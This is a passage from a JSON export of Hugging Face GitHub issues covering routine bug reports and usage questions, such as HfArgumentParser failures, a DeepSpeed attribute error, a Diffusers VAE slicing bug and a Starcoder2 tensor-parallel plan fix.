shuffle=True)\n print(dataset)\n\n if accelerator.is_main_process:\n dataset = dataset.map(formatting_function, remove_columns=['source_text', 'privacy_mask'])\n print(dataset)\n print(dataset['train'][0])\n\n tokenizer = t.AutoTokenizer.from_pretrained(model_name, trust_remote_code=True)\n tokenizer.pad_token = tokenizer.eos_token\n tokenizer.padding_side = \"right\"\n\n bnb_config = None\n if quantization and quantization_bits == \"4\":\n bnb_config = t.BitsAndBytesConfig(load_in_4bit=True, bnb_4bit_quant_type=\"nf4\", bnb_4bit_compute_dtype=torch.bfloat16, bnb_4bit_use_double_quant=True)\n elif quantization and quantization_bits == \"8\":\n bnb_config = t.BitsAndBytesConfig(load_in_8bit=True)\n\n model = t.AutoModelForCausalLM.from_pretrained(\n model_name,\n quantization_config=bnb_config,\n device_map={\"\": accelerator.process_index},\n dtype=torch.bfloat16 if use_mixed_precision else torch.float32,\n trust_remote_code=True\n )\n\n if quantization:\n model = p.prepare_model_for_kbit_training(model)\n model.config.use_cache = False\n model.config.pretraining_tp = 1\n model.config.pad_token_id = model.config.eos_token_id\n\n if lora:\n lora_config = p.LoraConfig(r=lora_rank, lora_alpha=lora_alpha, lora_dropout=lora_dropout, bias=\"none\", task_type=\"CAUSAL_LM\")\n model = p.get_peft_model(model, lora_config)\n model.train()\n\n sft_config = r.SFTConfig(\n learning_rate=learning_rate,\n num_train_epochs=num_train_epochs,\n per_device_train_batch_size=per_device_train_batch_size,\n gradient_accumulation_steps=gradient_accumulation_steps,\n output_dir=output_dir,\n eval_s", "url": "https://github.com/huggingface/trl/issues/4110", "state": "closed", "labels": [ "\ud83d\udc1b bug", "\ud83d\udcda documentation" ], "created_at": "2025-09-19T17:42:26Z", "updated_at": "2025-09-19T20:02:16Z", "user": "bminesh-shah" }, { "repo": "huggingface/transformers", "number": 41005, "title": "Are we have Qwen3VL Official Model Published by Alibaba", "body": "### Model description\n\nReference - https://huggingface.co/docs/transformers/main/en/model_doc/qwen3_vl#transformers.Qwen3VLForConditionalGeneration\n\nIf not when can we expect any guess?", "url": "https://github.com/huggingface/transformers/issues/41005", "state": "closed", "labels": [ "New model" ], "created_at": "2025-09-19T13:59:34Z", "updated_at": "2025-09-20T10:00:04Z", "comments": 1, "user": "Dineshkumar-Anandan-ZS0367" }, { "repo": "huggingface/transformers", "number": 40993, "title": "HfArgumentParser cannot parse TRL Config", "body": "### System Info\n\ntransformers==4.56.1\ntrl==0.17.0\n\nI used to apply code below\n\n```python\nfrom transformers import HfArgumentParser\nfrom trl import (\n\tScriptArguments, ModelConfig, SFTConfig\n)\nparser = HfArgumentParser((ScriptArguments, SFTConfig, ModelConfig))\nscript_arguments, trainer_config, model_config = parser.parse_args_into_dataclasses()\n```\n\nto parse training args, but after updating transformers to 4.56, it does not work:\n\n```\nTraceback (most recent call last):\n File \"D:\\mytest.py\", line 5, in \n parser = HfArgumentParser((ScriptArguments, SFTConfig, ModelConfig))\n File \"E:\\Anaconda3\\envs\\myopenai\\lib\\site-packages\\transformers\\hf_argparser.py\", line 143, in __init__\n self._add_dataclass_arguments(dtype)\n File \"E:\\Anaconda3\\envs\\myopenai\\lib\\site-packages\\transformers\\hf_argparser.py\", line 260, in _add_dataclass_arguments\n raise RuntimeError(\nRuntimeError: Type resolution failed for . Try declaring the class in global scope or removing line of `from __future__ import annotations` which opts in Postponed Evaluation of Annotations (PEP 563)\n```\n\nHow to fix it?\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nRun \n\n```python\nfrom transformers import HfArgumentParser\nfrom trl import (\n\tScriptArguments, ModelConfig, SFTConfig\n)\nparser = HfArgumentParser((ScriptArguments, SFTConfig, ModelConfig))\nscript_arguments, trainer_config, model_config = parser.parse_args_into_dataclasses()\n```\n\n### Expected behavior\n\nIt should be work", "url": "https://github.com/huggingface/transformers/issues/40993", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-19T08:29:48Z", "updated_at": "2025-09-19T09:06:20Z", "comments": 5, "user": "caoyang-sufe" }, { "repo": "huggingface/lerobot", "number": 1978, "title": "Is there a best fit model to each sim env\uff1f", "body": "I try to train diffusion\uff0csmolvla\uff0ceven pi0 on the aloha with 200k steps, and found that they all perform much worse (with less than 10% success rate) than act policy, why? Did each env task exist a best-fit policy? or there are problems on my training strategy.", "url": "https://github.com/huggingface/lerobot/issues/1978", "state": "closed", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-09-19T02:45:14Z", "updated_at": "2025-10-17T11:25:27Z", "user": "shs822" }, { "repo": "huggingface/accelerate", "number": 3784, "title": "AttributeError: 'Accelerator' object has no attribute 'deepspeed_config'. Did you mean: 'deepspeed_plugin'?", "body": "### System Info\n\n```Shell\n- Name: accelerate Version: 1.10.1\n- Name: transformers Version: 4.54.0\n- Name: deepspeed Version: 0.17.5\n- Name: torch Version: 2.8.0\n- Name: wandb Version: 0.21.4\n```\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nThis is a deepspeed stage 2 config which is in json:\n\n```\njson = {\n \"fp16\": {\n \"enabled\": false,\n \"auto_cast\": true,\n \"loss_scale\": 0,\n \"loss_scale_window\": 1000,\n \"initial_scale_power\": 16,\n \"hysteresis\": 2,\n \"min_loss_scale\": 1\n },\n \"bf16\": {\n \"enabled\": true\n },\n \"amp\": {\n \"enabled\": false\n },\n \"optimizer\": {\n \"type\": \"AdamW\",\n \"params\": {\n \"lr\": 0.0003,\n \"betas\": [0.9, 0.999],\n \"eps\": 1e-08,\n \"weight_decay\": 0.001\n }\n },\n \"scheduler\": {\n \"type\": \"WarmupLR\",\n \"params\": {\n \"warmup_min_lr\": 0,\n \"warmup_max_lr\": 0.0003,\n \"warmup_num_steps\": 0\n }\n },\n \"zero_optimization\": {\n \"stage\": 2,\n \"allgather_partitions\": true,\n \"allgather_bucket_size\": 5.000000e+08,\n \"overlap_comm\": false,\n \"reduce_scatter\": true,\n \"reduce_bucket_size\": 9.000000e+05,\n \"contiguous_gradients\": true,\n \"use_multi_rank_bucket_allreduce\": false\n },\n \"zero_state\": 2,\n \"gradient_accumulation_steps\": 1,\n \"gradient_clipping\": 1,\n \"train_micro_batch_size_per_gpu\": 4,\n \"mixed_precision\": \"bf16\",\n \"communication_data_type\": \"bf16\",\n \"steps_per_print\": inf\n}\n```\n\nI use `accelerate to spin up 8 workers on an AWS EC2 instance`:\n\n```bash\naccelerate launch --config_file configs/deepspeed.yaml scripts/main.py\n```\n\nThe following error is raised when the `trainer` runs `train`:\n\n```\n File \"/home/ubuntu/llm-classifiier/scripts/main.py\", line 88, in \n train_qwen_any(cli_args, run_args)\n File \"/home/ubuntu/llm-classifiier/scripts/train_qwen.py\", line 138, in train_qwen_any\n trainer.train()\n File \"/home/ubuntu/llm-classifiier/venv/lib/python3.12/site-packages/transformers/trainer.py\", line 2237, in train\n return inner_training_loop(\n ^^^^^^^^^^^^^^^^^^^^\n File \"/home/ubuntu/llm-classifiier/venv/lib/python3.12/site-packages/transformers/trainer.py\", line 2758, in _inner_training_loop\n self.control = self.callback_handler.on_train_end(args, self.state, self.control)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/ubuntu/llm-classifiier/venv/lib/python3.12/site-packages/transformers/trainer_callback.py\", line 509, in on_train_end\n return self.call_event(\"on_train_end\", args, state, control)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/ubuntu/llm-classifiier/venv/lib/python3.12/site-packages/transformers/trainer_callback.py\", line 556, in call_event\n result = getattr(callback, event)(\n ^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/ubuntu/llm-classifiier/venv/lib/python3.12/site-packages/transformers/integrations/integration_utils.py\", line 958, in on_train_end\n fake_trainer.save_model(temp_dir)\n File \"/home/ubuntu/llm-classifiier/venv/lib/python3.12/site-packages/transformers/trainer.py\", line 3965, in save_model\n state_dict = self.accelerator.get_state_dict(self.deepspeed)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/ubuntu/llm-classifiier/venv/lib/python3.12/site-packages/accelerate/accelerator.py\", line 3903, in get_state_dict\n zero3_sharding = self.deepspeed_config[\"zero_optimization\"][\"stage\"] == 3\n ^^^^^^^^^^^^^^^^^^^^^\nAttributeError: 'Accelerator' object has no attribute 'deepspeed_config'. Did you mean: 'deepspeed_plugin'?\n```\n\nI am not using zero3 sharding, so I don't know why this is an issue at all!\n\nMy deepspeed.yaml looks like this\n\n```\ncompute_environment: LOCAL_MACHINE\ndebug: true\ndeepspeed_config:\n deepspeed_config_file: configs/deepspeed_stg2.json\ndistributed_type: DEEPSPEED\nenable_cpu_affinity: false\nmachine_rank: 0\nmain_training_function: main\nnum_machines: 1\nnum_processes: 4\nrdzv_backend: static\nsame_network: true\ntpu_env: []\ntpu_use_cluster: false\ntpu_use_sudo: false\nuse_cpu: false\n```\n\nAnd the actual json file is above.\nBecause of this I cannot save my models or state_dicts.\n\n### Expected behavior\n\nUnless I am missing something profound, this really shouldn't be happening.", "url": "https://github.com/huggingface/accelerate/issues/3784", "state": "closed", "labels": [], "created_at": "2025-09-18T17:07:54Z", "updated_at": "2025-10-27T15:08:19Z", "comments": 1, "user": "alexge233" }, { "repo": "huggingface/lerobot", "number": 1969, "title": "how to record a multi-task dataset on so101?", "body": "I found that only can use \"dataset.single_task\" to record , but i need to record a dataset contains more than 3 tasks. how to solve it. ", "url": "https://github.com/huggingface/lerobot/issues/1969", "state": "closed", "labels": [], "created_at": "2025-09-18T10:18:00Z", "updated_at": "2025-09-21T02:50:59Z", "user": "Temmp1e" }, { "repo": "huggingface/lerobot", "number": 1966, "title": "SO101FollowerEndEffector?", "body": "I am trying to get inverse kinematics to work on my SO-101, and I found SO100FollowerEndEffector but there is no SO101FollowerEndEffector?\n\nI suspect they are interchangeable, but when I use SO100FollowerEndEffector on my SO-101, it want me to recalibrate it, so I just want to make sure before I break anything.", "url": "https://github.com/huggingface/lerobot/issues/1966", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-09-17T23:56:38Z", "updated_at": "2025-10-30T08:56:22Z", "user": "cashlo" }, { "repo": "huggingface/lighteval", "number": 970, "title": "How to use a configuration file?", "body": "The documentation makes references to using configuration yaml files like [here](https://huggingface.co/docs/lighteval/main/en/use-litellm-as-backend) but it doesn't give the name of the file or which option to feed the config to lighteval. I tried making a `config.yaml`, `config.yml` in the current directory and trying a `--config` option (doesn't exist).", "url": "https://github.com/huggingface/lighteval/issues/970", "state": "closed", "labels": [], "created_at": "2025-09-16T20:13:48Z", "updated_at": "2025-09-24T22:08:32Z", "user": "oluwandabira" }, { "repo": "huggingface/transformers", "number": 40915, "title": "HfArgumentParser does not support peft.LoraConfig", "body": "### System Info\n\n- `transformers` version: 4.57.0.dev0\n- Platform: Linux-5.14.0-284.73.1.el9_2.x86_64-x86_64-with-glibc2.39\n- Python version: 3.12.3\n- Huggingface_hub version: 0.34.4\n- Safetensors version: 0.5.2\n- Accelerate version: 1.10.1\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.8.0+cu128 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: No\n- Using GPU in script?: No\n- GPU type: NVIDIA A100-SXM4-80GB\n\n### Who can help?\n\n@ydshieh (I am not really sure who to tag here)\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\nfrom peft import LoraConfig # v0.17.1\nfrom transformers import HfArgumentParser # Built from source\n\np = HfArgumentParser(dataclass_types=LoraConfig) # fails\n```\n\n### Expected behavior\n\nI would expect LoraConfig to be supported by HfArgumentParser.\nAs I understand, this fails because HfArgumentParser does not support fields of type (`Optional[List[str], str]`).\n\nIs there a plan to support such fields?", "url": "https://github.com/huggingface/transformers/issues/40915", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-16T16:23:56Z", "updated_at": "2025-09-23T05:16:14Z", "comments": 5, "user": "romitjain" }, { "repo": "huggingface/diffusers", "number": 12338, "title": "`AutoencoderDC` bug with `pipe.enable_vae_slicing()` and decoding multiple images", "body": "### Describe the bug\n\nWhen using the Sana_Sprint_1.6B_1024px and the SANA1.5_4.8B_1024px models, I cannot enable VAE slicing when generating multiple images. I guess this issue will affect the rest of the Sana model and pipeline configurations because they all use the same `AutoencoderDC` model.\n\nI traced the issue to the following [line of code](https://github.com/huggingface/diffusers/blob/751e250f70cf446ae342c8a860d92f6a8b78261a/src/diffusers/models/autoencoders/autoencoder_dc.py#L620), and if I remove the `.sample` part the issue seems to be fixed.\n\nI intend to submit a PR for my proposed fix. Can I confirm that this is supposed to be the correct solution?\n\n### Reproduction\n\n```python\nfrom diffusers import SanaSprintPipeline\nimport torch\n\npipe = SanaSprintPipeline.from_pretrained(\"Efficient-Large-Model/Sana_Sprint_1.6B_1024px_diffusers\", text_encoder=text_encoder, torch_dtype=torch.bfloat16)\npipe.to(\"cuda\")\npipe.enable_vae_slicing()\n\nprompt = \"A girl\"\nnum_images_per_prompt = 8\noutput = pipe(\n\tprompt=prompt,\n\theight=1024,\n\twidth=1024,\n\tnum_inference_steps=2,\n\tnum_images_per_prompt=num_images_per_prompt,\n\tintermediate_timesteps=1.3,\n\tmax_timesteps=1.56830,\n\ttimesteps=None\n).images\n```\n\n### Logs\n\n```shell\nTraceback (most recent call last):\n File \"F:\\AI setups\\Diffusers\\scripts\\inference sana-sprint.py\", line 24, in \n output = pipe(\n ^^^^^\n File \"F:\\AI setups\\Diffusers\\diffusers-venv\\Lib\\site-packages\\torch\\utils\\_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"F:\\AI setups\\Diffusers\\diffusers-venv\\Lib\\site-packages\\diffusers\\pipelines\\sana\\pipeline_sana_sprint.py\", line 874, in __call__\n image = self.vae.decode(latents / self.vae.config.scaling_factor, return_dict=False)[0]\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"F:\\AI setups\\Diffusers\\diffusers-venv\\Lib\\site-packages\\diffusers\\utils\\accelerate_utils.py\", line 46, in wrapper\n return method(self, *args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"F:\\AI setups\\Diffusers\\diffusers-venv\\Lib\\site-packages\\diffusers\\models\\autoencoders\\autoencoder_dc.py\", line 620, in decode\n decoded_slices = [self._decode(z_slice).sample for z_slice in z.split(1)]\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"F:\\AI setups\\Diffusers\\diffusers-venv\\Lib\\site-packages\\diffusers\\models\\autoencoders\\autoencoder_dc.py\", line 620, in \n decoded_slices = [self._decode(z_slice).sample for z_slice in z.split(1)]\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nAttributeError: 'Tensor' object has no attribute 'sample'\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.36.0.dev0\n- Platform: Windows-10-10.0.26100-SP0\n- Running on Google Colab?: No\n- Python version: 3.11.9\n- PyTorch version (GPU?): 2.7.1+cu128 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.34.4\n- Transformers version: 4.55.0\n- Accelerate version: 1.10.0\n- PEFT version: 0.17.0\n- Bitsandbytes version: 0.47.0\n- Safetensors version: 0.6.2\n- xFormers version: 0.0.31.post1\n- Accelerator: NVIDIA GeForce RTX 4090, 24564 MiB\n- Using GPU in script?: No\n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n@yiyixuxu @DN6 ", "url": "https://github.com/huggingface/diffusers/issues/12338", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-16T12:23:29Z", "updated_at": "2025-09-22T06:55:35Z", "comments": 0, "user": "mingyi456" }, { "repo": "huggingface/optimum", "number": 2355, "title": "Support exporting text-ranking for BERT models", "body": "### Feature request\n\nCurrently, `optimum-cli export onnx --model cross-encoder/ms-marco-MiniLM-L-12-v2 cross-encoder--ms-marco-MiniLM-L-12-v2-onnx` says:\n\n```\nValueError: Asked to export a bert model for the task text-ranking (auto-detected), but the Optimum ONNX exporter only supports the tasks feature-extraction, fill-mask, multiple-choice, question-answering, text-classification, token-classification for bert. Please use a supported task. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the task text-ranking to be supported in the ONNX export for bert.\n```\n\n### Motivation\n\nI'm working on a tool that I intend to distribute to others, for example via `brew install`. It's difficult to packaghe and ship Python, and I also want to prioritize speed of many filesystem and related operations, so I'm writing in Rust, using candle.\n\nIt can be a lot of work to implement every single model type by hand in candle. candle-transformers doesn't implement BertForSequenceClassification. Moreover, as model architectures change, I don't want to have to implement each one. It's great to be able to have the entire computation graph stored as data, as in ONNX.\n\n### Your contribution\n\nI'm willing to take a stab at this! If you think it would be helpful, and if you could give a couple pointers how to start!", "url": "https://github.com/huggingface/optimum/issues/2355", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-09-15T21:23:35Z", "updated_at": "2025-10-21T02:10:29Z", "comments": 1, "user": "kshitijl" }, { "repo": "huggingface/lerobot", "number": 1923, "title": "Deploying SmolVLA with a simulator", "body": "Has anyone been able to deploy the SmolVLA model to control say the SO-100 on a simulator like IsaacSim? \nEven if the fine-tuning reliably converges the observed performance on the simulator seems erratic. Do we apply the predicted actions from SmolVLA directly into the Articulation controller as positions? ", "url": "https://github.com/huggingface/lerobot/issues/1923", "state": "closed", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-09-12T21:06:40Z", "updated_at": "2025-12-11T22:07:02Z", "user": "aditya1709" }, { "repo": "huggingface/swift-transformers", "number": 237, "title": "Please help. Seeing issues with Hub when integrating", "body": "Hello, I'm trying to integrate WhisperKit via https://github.com/argmaxinc/WhisperKit/blob/main/Package.swift but that seems to bring in [swift-transformers](https://github.com/huggingface/swift-transformers) and Hub. I'm seeing issues as below \n\nHub.package.swiftinterface:34:32: warning: 'BinaryDistinctCharacter' is not a member type of struct 'Hub.Hub'\n23:54:09 32 | public init(_ str: Foundation.NSString)\n23:54:09 33 | public init(_ str: Swift.String)\n23:54:09 34 | public init(_ character: Hub.BinaryDistinctCharacter)\n23:54:09 | `- warning: 'BinaryDistinctCharacter' is not a member type of struct 'Hub.Hub'\n23:54:09 35 | public init(_ characters: [Hub.BinaryDistinctCharacter])\n23:54:09 36 | public init(stringLiteral value: Swift.String\n\nI'm on xcode 16.4 and using swift 5.10. Please help!! Thanks in advance! ", "url": "https://github.com/huggingface/swift-transformers/issues/237", "state": "closed", "labels": [ "question" ], "created_at": "2025-09-12T17:06:28Z", "updated_at": "2025-09-17T15:36:52Z", "user": "rpatnayakuni22" }, { "repo": "huggingface/transformers", "number": 40815, "title": "get_decoder feature regression in 4.56.0", "body": "### System Info\n\nIn the release of transformers v4.56.0, this PR https://github.com/huggingface/transformers/pull/39509 introduced a refactor of the public `get_decoder` method which previously existed on modes by moving it to the PreTrainedModel class.\n\nUnfortunately this introduced a significant behavior change in that `*CausalForLM` models no longer have the same behavior of having `get_decoder()` return the underlying base model.\n\nFor example a `MistralForCausalLM` model named `model` returns `None` when `model.get_decoder()` is called. \n\nThe logic for why is occurring is obvious when looking at the offending PR:\n\n```python\ndef get_decoder(self):\n \"\"\"\n Best-effort lookup of the *decoder* module.\n Order of attempts (covers ~85 % of current usages):\n 1. `self.decoder`\n 2. `self.model` (many wrappers store the decoder here)\n 3. `self.model.get_decoder()` (nested wrappers)\n 4. fallback: raise for the few exotic models that need a bespoke rule\n \"\"\"\n if hasattr(self, \"decoder\"):\n return self.decoder\n\n if hasattr(self, \"model\"):\n inner = self.model\n if hasattr(inner, \"get_decoder\"):\n return inner.get_decoder()\n return inner\n\n return None\n```\n\nIn these cases the `if hasattr(self, \"model\"):` conditional block is entered, and the underlying model has a `get_decoder` method, as it is a `PreTrainedModel`, as all transformers models are. This block will always be entered. At this point we are now in the decoder itself calling its `get_decoder` method. The decoder has no decoder or model attribute, so the function returns `None`, which is the passed to the parent caller.\n\nThere are a couple of ways this could be fixed, but I don't know what their current impact would be on other parts of the code. I may open a PR, but I am quite busy at the moment. @molbap @ArthurZucker since you were the authors and reviewers here, do you mind taking another look at this?\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nUse `get_decoder` on say a `MistralForCausalLM` model.\n\n### Expected behavior\n\nThe underlying `model` attribute should be returned for `*ForCausalLM` models, not None, as these models are decoder only models by transformers convention.", "url": "https://github.com/huggingface/transformers/issues/40815", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-11T09:25:12Z", "updated_at": "2025-09-16T08:57:14Z", "comments": 4, "user": "KyleMylonakisProtopia" }, { "repo": "huggingface/transformers", "number": 40813, "title": "Incorrect sharding configuration for Starcoder2 model", "body": "### System Info\n\nTransformers main branch (commit [0f1b128](https://github.com/huggingface/transformers/commit/0f1b128d3359a26bd18be99c26d7f04fb3cba914) )\n- `transformers` version: 4.57.0.dev0\n- Platform: Linux-5.15.0-1030-nvidia-x86_64-with-glibc2.39\n- Python version: 3.12.3\n- Huggingface_hub version: 0.34.4\n- Safetensors version: 0.5.3\n- Accelerate version: 1.10.1\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.8.0a0+5228986c39.nv25.06 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: tensor-parallel\n- Using GPU in script?: yes\n- GPU type: NVIDIA H100 80GB HBM3\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nTunning TP inference on `bigcode/starcoder2-7b` throws an error with incorrect tensor shapes due to `base_model_tp_plan` misconfiguration.\n\n`demo.py`:\n```\nimport os\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\n\nmodel_id = \"bigcode/starcoder2-7b\"\nmodel = AutoModelForCausalLM.from_pretrained(model_id, tp_plan=\"auto\")\n\nmodel._tp_plan['model.layers.*.mlp.c_proj'] = 'rowwise'\nprint(f\"TP plan: {model._tp_plan}, class: {type(model._tp_plan)}\")\n\ntokenizer = AutoTokenizer.from_pretrained(model_id)\nprompt = \"Can I help\"\ninputs = tokenizer(prompt, return_tensors=\"pt\").input_ids.to(model.device)\n\n# distributed run\noutputs = model(inputs)\n\n# print the output\nprint(outputs)\n```\nrun with\n```\ntorchrun --nproc_per_node=2 demo.py\n```\n\nThe correct `base_model_tp_plan` should replace:\n```\n['model.layers.*.mlp.c_proj'] = 'colwise'\n```\nwith \n```\n['model.layers.*.mlp.c_proj'] = 'rowwise'\n```\n\n### Expected behavior\n\nThrows:\n```\n(...)\n[rank0]: File \"/lustre/fs1/portfolios/coreai/users/gkwasniewski/hf-repo/transformers/src/transformers/models/starcoder2/modeling_starcoder2.py\", line 65, in forward\n[rank0]: hidden_states = self.c_proj(hidden_states)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n[rank0]: return self._call_impl(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/module.py\", line 1857, in _call_impl\n[rank0]: return inner()\n[rank0]: ^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/module.py\", line 1805, in inner\n[rank0]: result = forward_call(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/linear.py\", line 125, in forward\n[rank0]: return F.linear(input, self.weight, self.bias)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/_compile.py\", line 51, in inner\n[rank0]: return disable_fn(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/_dynamo/eval_frame.py\", line 850, in _fn\n[rank0]: return fn(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/distributed/tensor/_api.py\", line 350, in __torch_dispatch__\n[rank0]: return DTensor._op_dispatcher.dispatch(\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/distributed/tensor/_dispatch.py\", line 160, in dispatch\n[rank0]: self.sharding_propagator.propagate(op_info)\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/distributed/tensor/_sharding_prop.py\", line 266, in propagate\n[rank0]: OutputSharding, self.propagate_op_sharding(op_info.schema)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/distributed/tensor/_sharding_prop.py\", line 45, in __call__\n[rank0]: return self.cache(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/distributed/tensor/_sharding_prop.py\", line 279, in propagate_op_sharding_non_cached\n[rank0]: out_tensor_meta = self._propagate_tensor_meta_non_cached(op_schema)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/distributed/tensor/_sharding_prop.py\", line 126, in _propagate_tensor_meta_non_cached\n[rank0]: fake_out = op_schema.op(*fake_args, **fake_kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[ra", "url": "https://github.com/huggingface/transformers/issues/40813", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-11T09:02:53Z", "updated_at": "2025-09-15T08:46:33Z", "comments": 1, "user": "greg-kwasniewski1" }, { "repo": "huggingface/lerobot", "number": 1911, "title": "How to avoid re-write cache data from pyarrow into parquet everytime?", "body": "Hi Authors,\n\nWhen using lerobot dataset in a pytorch dataloader, lerobot dataset will write a huge cache data which is converted from pyarrow to Apache Parquet. How to avoid that?\n\nI can think of two options:\n\n1. Avoid converting to Parquet data and directly read from parquet data. But this may loose reading performance.\n2. Can we instead store the Parquet data? \n\nThanks.\n\nSonglin", "url": "https://github.com/huggingface/lerobot/issues/1911", "state": "open", "labels": [], "created_at": "2025-09-10T22:19:25Z", "updated_at": "2025-09-10T22:19:25Z", "user": "songlinwei-we" }, { "repo": "huggingface/transformers", "number": 40767, "title": "3D Object Detection Models", "body": "### Model description\n\nHi together,\nis there a reason or any other thread where 3D models like those at mmdet3d are discussed to be implemented. I have not found any discussion.\nThanks\n\n### Open source status\n\n- [ ] The model implementation is available\n- [ ] The model weights are available\n\n### Provide useful links for the implementation\n\nBEVFormer: \nhttps://github.com/fundamentalvision/BEVFormer", "url": "https://github.com/huggingface/transformers/issues/40767", "state": "open", "labels": [ "New model" ], "created_at": "2025-09-09T13:16:33Z", "updated_at": "2025-11-13T21:18:40Z", "comments": 3, "user": "SeucheAchat9115" }, { "repo": "huggingface/lerobot", "number": 1899, "title": "Has anyone tried to export the smolvla as onnx model for deployment?", "body": "I have tried to test the trained smolvla model on my PC, it works. I want now to deploy the smolvla on our target board. \n\nI looked into the model structure of smolvla, for the vision-encoder and language embedding parts I can refer to the smolvlm and export them as tow onnx models. I think the robot state embedding also needs to be considered to export as a new onnx model.\n\nThe most important part of smolvla inference, i met several issues and have no good idea how to export it as a onnx model.l.\n\nHas anyone tried and successfully exported the smolvla as onnx models for deployment? Thanks!", "url": "https://github.com/huggingface/lerobot/issues/1899", "state": "open", "labels": [ "question", "policies", "performance" ], "created_at": "2025-09-09T10:41:14Z", "updated_at": "2025-10-07T20:50:12Z", "user": "TankerLee" }, { "repo": "huggingface/huggingface_hub", "number": 3339, "title": "What is the best replacement of HfFileSystem.glob with HfApi", "body": "In some of our code, we were using something like\n\n```python\nhf_fs = HfFileSystem()\nfiles = hf_fs.glob('my/repo/*/model.onnx')\n```\n\nBut I found that HfFileSystem is much less stable than 